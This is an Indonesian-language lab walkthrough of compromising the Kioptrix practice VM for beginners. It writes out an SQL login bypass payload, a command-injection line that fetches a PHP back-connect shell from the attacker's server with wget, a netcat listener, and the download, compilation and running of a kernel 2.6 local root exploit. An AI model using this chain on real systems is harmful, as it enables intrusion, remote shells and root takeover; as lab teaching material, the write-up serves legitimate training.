<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-WnY77rUgZfk/Vt9374ij5cI/AAAAAAAAAvI/dMP9aeqV4HE/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-WnY77rUgZfk/Vt9374ij5cI/AAAAAAAAAvI/dMP9aeqV4HE/s320/kioptrix-linuxsec_org.png" width="320" height="108" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita coba bypass sql login dengan user dan password <span style="font-weight: bold;" class="mycode_b">'=' 'or'</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata tembus.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Bagi yang belum tau tentang Bypass SQL Login, bisa baca baca disini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://exploit.linuxsec.org/2014/02/tutorial-hack-website-dengan-bypass-sql.html" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Tutorial Bypass Admin Login Website</span></a></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-XNl4gTP_Z80/Vt94yTeCdVI/AAAAAAAAAvY/fQfCS0cKmTw/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-XNl4gTP_Z80/Vt94yTeCdVI/AAAAAAAAAvY/fQfCS0cKmTw/s320/kioptrix-linuxsec_org.png" width="320" height="109" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya skip skip saja ya tulisannya. Di akhir tulisan nanti saya lampirkan video nya jika kurang jelas.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Setelah beberapa kali dilakukan percobaan akhirnya diketahui kalau selain untuk pelakukan ping, kolom diatas juga bisa melakukan perintah perintah linux.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tentu saja dengan command injection.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Disini saya akan melakukan back connect sehingga saya mengupload BackConnect Shell ke target.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">command nya :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">;wget http://serverkita/shell.txt -O /tmp/shell.php</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita mengupload di folder /tmp karena hanya folder itu yang writable.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk Shell nya silahkan download disini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://pastebin.com/dri7LrLF" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Download Back Connect Shell</span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sesuaikan sendiri untuk ip dan port nya.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Selanjutya, kita buka terminal di main OS.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">masukkan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; sudo nc -l 1337</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">1337 adalah port yang saya gunakan untuk back connect . Sama kan dengan yang ada di shell.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah , di web Kioptrix nya tadi, masukkan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">;php /tmp/shell.php</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sesuaikan dengan nama shell mu.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Maka di terminal akan terbuka shell, namun masih regular user.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-HMSlnUmShBQ/Vt97l0F7PyI/AAAAAAAAAvk/-HzTuvXFiig/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-HMSlnUmShBQ/Vt97l0F7PyI/AAAAAAAAAvk/-HzTuvXFiig/s320/kioptrix-linuxsec_org.png" width="320" height="86" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekarang masukkan command uname -a untuk mengetahui versi kernel yang digunakan target.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-IgYAbJXA_HI/Vt98AOvqAiI/AAAAAAAAAvo/G5ntucWzDEI/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-IgYAbJXA_HI/Vt98AOvqAiI/AAAAAAAAAvo/G5ntucWzDEI/s320/kioptrix-linuxsec_org.png" width="320" height="54" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah, kernel yang digunakan lumayan sudah tua. jadi kemungkinan ada di Exploit-DB . kalian bisa cek sendiri di exploit-db dengan memasukkan versi kernel yang tertera.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Berhubung saya punya searchsploit, saya tinggal mencari nya lewat terminal.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">bagi yang ingin menginstall bisa ikuti tutorial dibawah ini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://www.linuxsec.org/2015/12/searchsploit.html" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Cara Install Searchsploit di Ubuntu Linux</span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oke lanjut, masukkan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; searchsploit kernel 2.6 root</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Itu keyword yang saya gunakan untuk mencari localroot kernel 2.6 yang digunakan kioptrix.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ada banyak output nya. Saya coba yang<span style="font-weight: bold;" class="mycode_b"> ring0 Root Exploit</span>.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-fLtpGwjLcFE/Vt99j-cjRdI/AAAAAAAAAv4/vyG9wKN1UlU/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://2.bp.blogspot.com/-fLtpGwjLcFE/Vt99j-cjRdI/AAAAAAAAAv4/vyG9wKN1UlU/s320/kioptrix-linuxsec_org.png" width="320" height="180" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Lalu kita copy file .c nya ke /var/www/html agar bisa didownload.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">uzumaki@linuxsec:~&#36; cp /path/to/searchsploit/localroot.c /var/www/html/root.c</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Selanjutnya dari shell yang didapat dari back connect sebelumnya, kita download dan kita compile exploit tadi.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; cd /tmp</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; wget http://serverkita/root.c /tmp/root.c</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; gcc root.c -o rootme</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; chmod +x rootme</span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://3.bp.blogspot.com/-6Y0cOyEVPhU/Vt9-_JGZ5nI/AAAAAAAAAwE/NtnQQj1TZTc/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://3.bp.blogspot.com/-6Y0cOyEVPhU/Vt9-_JGZ5nI/AAAAAAAAAwE/NtnQQj1TZTc/s320/kioptrix-linuxsec_org.png" width="320" height="188" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Lalu kita jalankan exploit nya dengan command :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00&#36; ./rootme</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Maka kalian akan masuk ke root.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: red;" class="mycode_color">sh-3.00# whoami</span></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><span style="color: blue;" class="mycode_color">root</span></span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://3.bp.blogspot.com/-OsM_KGTw4Rc/Vt9_hPqeYsI/AAAAAAAAAwI/YDbHSybjKxQ/s1600/kioptrix-linuxsec_org.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://3.bp.blogspot.com/-OsM_KGTw4Rc/Vt9_hPqeYsI/AAAAAAAAAwI/YDbHSybjKxQ/s320/kioptrix-linuxsec_org.png" width="390" height="129" alt="[Image: kioptrix-linuxsec_org.png]" class="mycode_img" /></span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Misi terselesaikan..</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Bagi yang kurang jelas bisa lihat video dibawah :</span></span></span></div>
<br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/0NSfRqvgIkE" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Mungkin kurang menantang bagi kalian yang sudah expert di bidang pentesting, tapi sekali lagi tujuan dari Kioptrix sendiri adalah untuk pembelajaran dasar, sehinga lebih diperuntukkan kepada pemula yang ingin tahu bagaimana alur serangan dilakukan.</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">jadi buat kalian yang masih awam, silahkan mencoba.</span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekian tutorial kali ini, semoga bermanfaat, share juga ke teman temanmu biar mereka tau.</span></span></span>]]></content:encoded>
		</item>
	</channel>
</rss>